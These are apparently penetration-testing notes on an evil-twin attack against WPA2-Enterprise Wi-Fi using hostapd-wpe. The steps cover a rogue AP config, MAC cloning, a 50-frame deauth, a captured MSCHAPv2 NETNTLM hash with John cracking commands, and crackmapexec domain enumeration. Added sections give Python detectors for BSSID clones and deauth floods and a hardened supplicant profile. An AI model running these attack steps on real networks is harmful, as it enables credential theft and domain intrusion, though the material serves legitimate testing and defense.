# HOSTAPD-WPE

[**hostapd-wpe**](https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/hostapd-wpe)

Install the build dependencies (Debian/Kali):

```
apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommends
```

Download the files:

```
wget https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/hostapd-2.10-wpe.patch
wget https://w1.fi/releases/hostapd-2.10.tar.gz
tar -zxf hostapd-2.10.tar.gz
cd hostapd-2.10
patch -p1 < ../hostapd-2.10-wpe.patch
cd hostapd
```

Build, install, and then install the WPE configuration files:

```
make
make install
make wpe
```

**Creating certs**

```
cd /etc/hostapd-wpe/certs
./bootstrap
make install
```

Write the AP configuration file (`wpeattackap.conf` is the name passed to hostapd-wpe below; the listing was saved as `wpe_custom.conf`, any name works as long as it matches the path on the command line). hostapd does not strip trailing `# ...` comments from value lines (an inline comment after `ssid=` becomes part of the SSID and makes it too long), so comments are kept on lines of their own:

```
# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan0mon
# name of the target AP (set it even if the real network hides its SSID)
ssid=XX-AP
channel=4
hw_mode=g

# --------------------
# WPA configuration
# --------------------
# use WPA2 version
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP

# --------------------------
# EAP server configuration
# --------------------------
# require 802.1X authentication
ieee8021x=1
# EAPOL key index workaround for the WinXP supplicant (disabled here)
eapol_key_index_workaround=0
# enable the integrated EAP server instead of an external RADIUS server
eap_server=1
# file containing the user information
#eap_user_file=fakenet.eap_user

# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
#ca_cert=/root/certs/ca.pem
#server_cert=/root/certs/server.pem
# private key for the server certificate
#private_key=/root/certs/server.key
# password used to encrypt the private key (empty here)
#private_key_passwd=
# DH/DSA parameters file (PEM format)
#dh_file=/root/certs/dhparam.pem

# paths used by the hostapd-wpe install under /etc/hostapd-wpe
eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh

# -----------------------------
# mana specific configuration
# -----------------------------
# enable WPE mode to intercept various EAP credentials
#mana_wpe=1
# return EAP success to the clients and have them connect
#mana_eapsuccess=1
```

Clone the target AP's MAC address (BSSID) onto the interface (bring the interface down first; macchanger cannot change the address while it is up):

```
macchanger --mac XX:XX:XX:XX:XX:XX <interface>
```
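The MAC clone is also what gives the rogue AP away: the same BSSID now beacons on a second channel (channel 4 in the configuration above) and, unlike the real hidden network, broadcasts its SSID. The following Python is an added detection example, not code from the page or from the hostapd-wpe project; the baseline of sanctioned APs and the scan records are constructed, and the `Beacon` fields are what a WIDS sensor or an airodump-ng-style scan would typically record.

```python
"""Detect a BSSID clone: the same AP MAC address showing up with a channel,
security setting or SSID behaviour that differs from the sanctioned baseline.
All data below is constructed for this example; nothing is a real capture."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Beacon:
    bssid: str
    essid: str      # "" when the SSID is hidden (zero-length SSID element)
    channel: int
    akm: str        # key management advertised in the RSN IE, e.g. "WPA-EAP"
    signal: int     # dBm as seen by the sensor


# Sanctioned APs (constructed): bssid -> (essid, channel, akm, hidden)
BASELINE = {
    "02:00:00:00:00:01": ("XX-AP", 11, "WPA-EAP", True),
    "02:00:00:00:00:02": ("XX-AP", 36, "WPA-EAP", True),
}


def check_beacons(beacons, baseline=BASELINE):
    """Return a sorted list of unique (reason, bssid, detail) alerts."""
    sanctioned_essids = {e for e, _, _, _ in baseline.values()}
    alerts = set()
    for b in beacons:
        known = baseline.get(b.bssid)
        if known is None:
            # A new BSSID advertising one of our SSIDs is a rogue AP even
            # without a MAC clone.
            if b.essid in sanctioned_essids:
                alerts.add(("unknown-bssid", b.bssid,
                            f"essid={b.essid} ch={b.channel}"))
            continue
        essid, channel, akm, hidden = known
        if b.channel != channel:
            alerts.add(("clone-channel", b.bssid,
                        f"ch={b.channel} expected {channel}"))
        if b.akm != akm:
            alerts.add(("clone-akm", b.bssid, f"akm={b.akm} expected {akm}"))
        if hidden and b.essid:
            # The sanctioned AP beacons with an empty SSID; a clone that has
            # ssid= set in its config broadcasts the name.
            alerts.add(("clone-ssid-broadcast", b.bssid, f"essid={b.essid}"))
    return sorted(alerts)


# Constructed scan: two genuine beacons, one clone of the first BSSID on
# channel 4 broadcasting the SSID, and an unrelated guest AP.
SAMPLE = [
    Beacon("02:00:00:00:00:01", "", 11, "WPA-EAP", -61),
    Beacon("02:00:00:00:00:02", "", 36, "WPA-EAP", -70),
    Beacon("02:00:00:00:00:01", "XX-AP", 4, "WPA-EAP", -34),
    Beacon("0a:00:00:00:00:99", "Guest", 6, "OPEN", -72),
]

if __name__ == "__main__":
    for reason, bssid, detail in check_beacons(SAMPLE):
        print(f"{reason}: {bssid} ({detail})")
```

A clone sitting on the same channel as the real AP would only trip the SSID-broadcast or AKM checks, so a sensor that also tracks signal strength per BSSID (the rogue is usually much louder) catches the remaining case.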

```
sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf
```

Monitor the channel and write the capture to `temp`:

```
sudo airodump-ng --channel 4 wlp0s20f3 -w temp --essid-regex XX-AP
```

Deauthenticate the clients (with the MAC clone, a deauth is not necessary if the signal is strong \m/):

```
sudo aireplay-ng --deauth 50 -a 6c:8d:77:27:a1:25  --ignore-negative-one wlp0s20f3
```
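A burst of 50 deauthentication frames carrying the AP's own address is exactly what a wireless IDS should alarm on, since a real AP deauths single clients occasionally, not the broadcast address dozens of times a second. The Python below is an added detection example, not code from the page; the frame log is constructed to mirror the `--deauth 50` burst above, and the window and threshold values are assumptions to tune per site.

```python
"""Flag deauthentication/disassociation floods in 802.11 management-frame
records. The frame log is constructed for this example, not captured."""
from collections import defaultdict, deque

AP_BSSID = "02:00:00:00:00:01"      # constructed sanctioned AP address
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed frame log: (timestamp_s, subtype, src_addr, dst_addr).
FRAMES = (
    # Normal operation: the AP occasionally deauths a single idle client.
    [(0.0, "deauth", AP_BSSID, "02:00:00:00:00:aa"),
     (12.0, "beacon", AP_BSSID, BROADCAST),
     (30.0, "disassoc", AP_BSSID, "02:00:00:00:00:bb")]
    # Flood: 50 broadcast deauths spoofing the AP address within half a second.
    + [(10.0 + i * 0.01, "deauth", AP_BSSID, BROADCAST) for i in range(50)]
)


def deauth_bursts(frames, window_s=1.0, threshold=10):
    """Return {src_addr: peak_count} for every source address whose
    deauth/disassoc frames reach `threshold` inside any sliding window of
    `window_s` seconds."""
    recent = defaultdict(deque)     # src -> timestamps of recent deauth/disassoc
    flagged = {}
    for ts, subtype, src, _dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()             # drop frames that fell out of the window
        if len(q) >= threshold:
            flagged[src] = max(flagged.get(src, 0), len(q))
    return flagged


if __name__ == "__main__":
    for src, n in deauth_bursts(FRAMES).items():
        print(f"{src}: {n} deauth/disassoc frames within 1 s (possible flood)")
```

Detection is the fallback; the actual fix is Protected Management Frames (802.11w), which makes clients discard spoofed deauth and disassociation frames so the burst no longer disconnects anyone.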

**GOTCHA!**

```
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.1X: Identity received from STA: 'XXXX\xxx.xxx'


mschapv2: Fri Mar 15 03:36:34 2024
         username:      xxx\xxx.xx
         challenge:     57:f6xx:c6:33:4b
         response:      9e:2a:87xxxxx:ef:b2:58:4a:3f:b3:fd:1d:03:08
         jtr NETNTLM:           xx\xx.leao:$NETNTLM$57f6xc6334b$9exxxxxxx84a3fb3fd1d0308
         hashcat NETNTLM:       xx\xx.leao::::9e2a8702xxf6bbxxxx3fb3fd1d0308:57f6xxxc6334b
wlan0mon: STA 5c:fb:3a:2f:00:2f IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: associated (aid 3)
```
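The capture above works only because the supplicant accepted the rogue AP's server certificate and ran MSCHAPv2 through the resulting tunnel, and the first log line shows the outer identity going over the air in the clear. As an added defensive example that is not from the original page, the two wpa_supplicant network blocks below show a weak client profile beside a hardened one. The CA path, RADIUS server name, identity and realm are placeholders.

```conf
# WEAK: no ca_cert and no server-name check, so any server that presents a
# certificate is trusted. This is the profile a rogue EAP server exploits.
network={
    ssid="XX-AP"
    # required for a hidden SSID
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    # placeholders
    identity="DOMAIN\user"
    password="<password>"
    phase2="auth=MSCHAPV2"
}

# HARDENED: pin the issuing CA, require the RADIUS server's name in the
# certificate, and keep the real username inside the TLS tunnel.
network={
    ssid="XX-AP"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    # outer identity sent in the clear; the real one travels inside the tunnel
    anonymous_identity="anonymous@example.local"
    identity="DOMAIN\user"
    password="<password>"
    # placeholder path to the corporate RADIUS CA (not the system CA bundle)
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    # exact match against the server certificate's subject/SAN; placeholder name
    domain_match="radius.example.local"
    phase2="auth=MSCHAPV2"
}
```

With `ca_cert` and `domain_match` set, the supplicant aborts the TLS handshake before any inner MSCHAPv2 exchange, so there is nothing for hostapd-wpe to log; the same two controls (CA pinning and server-name validation) are what to enforce in the Windows and mobile profiles pushed to the same fleet.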

Cracking it! Save the `jtr NETNTLM:` line from the log to a file and hand it to John:

```
john --format=netntlm hash.txt
```

## Getting Domain Admin From WiFi (Scratch Approach) \o/

Because the SSID is hidden, the network has to be added manually as a "hidden" network in the client's connection manager.

Once connected, DHCP provides the domain's DNS server and search domain, and the domain name resolves to several hosts (in an AD domain, those are the domain controllers):

```
cat /etc/resolv.conf
nameserver 127.0.0.53
options edns0 trust-ad
search xxx.local

ptavares@kali:~$ host xxxx.local
xxx.local has address 10.1.11.36
xxxx.local has address 10.0.4.1
xxxx.local has address 10.1.0.1
```

Bloodhound or other tools can be executed now ;)

```
crackmapexec smb DC01 -u '<user>' -p '<password>' --users
```

## Reference

<https://www.netprojnetworks.com/wireless-pentest-lab-part-3/>
